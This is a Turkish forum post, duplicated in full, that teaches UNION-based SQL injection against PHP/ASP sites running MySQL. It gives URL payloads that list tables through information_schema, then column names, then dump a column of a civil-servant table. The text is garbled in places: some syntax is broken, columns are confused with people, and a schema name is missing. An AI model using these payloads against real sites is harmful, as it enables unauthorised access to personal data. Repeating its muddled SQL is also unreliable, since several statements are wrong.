S.A Arkadaşlar...
Arkadaşlar SQL bir veritabanı dilidir. ve MySQL de bunun bir parçasıdır.
Genellikle php ve asp dilleriyle yazılmış sitelerde kendini belli eder. Şuanda pek çok Sitede Bulunmaktadır. MySQL hakkında görsel bilgi vereyim...
Diye bir tablomuz var...
Şimdi (Emre) adlı memurun bilgilerini nasıl çekeriz ?
# Memurlar adlı tabloda
#Emre adlı kolonda saklanmaktadır bilgiler...
union * select * emre * from * memur
Bu kod şu demektir...
Memurlar adlı tablodan kolon adı emre olan kişiyi çağır...
Dediğimizde Emre adlı kişinin bilgileri ekrana vurmuş olur...
MySQL versiyon 4’te iş access gibi tahmine dayanır. ama versiyon 5 te bu şekilde değildir...
Tablo adını bkz.
www.site.com/catogary.php?id=1 union select table_name from information_schema.tables
Şeklinde alabiliriz...
Ve Ekrana Tablo adlaı vurur Ardından ;
www.site.com/catogary.php?id=1 union select column_name from columns where table_name="memurlar"
Bu kodlada malum kolonumuz olan Emre kolonuna ulaşırız...
ve Emre adlı kolonu çağırmak için;
www.site.com/catogary.php?id=1 union select Emre from memurlar
dediğimizde Ekranda herşey gözükür...
Fazla derin anlatmadım
Yararlı Olması Dileğiyle...
Alıntıdır.
Arkadaşlar SQL bir veritabanı dilidir. ve MySQL de bunun bir parçasıdır.
Genellikle php ve asp dilleriyle yazılmış sitelerde kendini belli eder. Şuanda pek çok Sitede Bulunmaktadır. MySQL hakkında görsel bilgi vereyim...
Diye bir tablomuz var...
Şimdi (Emre) adlı memurun bilgilerini nasıl çekeriz ?
# Memurlar adlı tabloda
#Emre adlı kolonda saklanmaktadır bilgiler...
union * select * emre * from * memur
Bu kod şu demektir...
Memurlar adlı tablodan kolon adı emre olan kişiyi çağır...
Dediğimizde Emre adlı kişinin bilgileri ekrana vurmuş olur...
MySQL versiyon 4’te iş access gibi tahmine dayanır. ama versiyon 5 te bu şekilde değildir...
Tablo adını bkz.
www.site.com/catogary.php?id=1 union select table_name from information_schema.tables
Şeklinde alabiliriz...
Ve Ekrana Tablo adlaı vurur Ardından ;
www.site.com/catogary.php?id=1 union select column_name from columns where table_name="memurlar"
Bu kodlada malum kolonumuz olan Emre kolonuna ulaşırız...
ve Emre adlı kolonu çağırmak için;
www.site.com/catogary.php?id=1 union select Emre from memurlar
dediğimizde Ekranda herşey gözükür...
Fazla derin anlatmadım
Yararlı Olması Dileğiyle...
Alıntıdır.
